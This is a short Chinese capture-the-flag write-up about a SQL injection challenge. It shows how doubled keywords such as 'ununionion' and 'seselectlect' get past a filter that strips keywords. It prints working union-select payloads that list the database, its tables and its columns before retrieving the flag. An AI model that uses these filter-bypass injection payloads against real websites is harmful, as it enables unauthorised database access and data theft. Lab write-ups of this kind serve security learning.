1、查看题目:
发现存在过滤:
在检测字段时发现or被过滤了,尝试双写绕过:
2、双写绕过:
重复两次SQL注入的语句:
3、查看数据库信息:
1' ununionion seselectlect 1,2,database()#
数据库名为geek.
4、查看表名:
1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
发现两个表名:
b4bsql,geekuser
5、查看b4bsql表下的列名:
1' ununionion seselectlect 1,2,group_concat(column_name)frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
发现了三个列名:
6、查看username ,id , passwoorrd这三个列中的内容:
得到flag。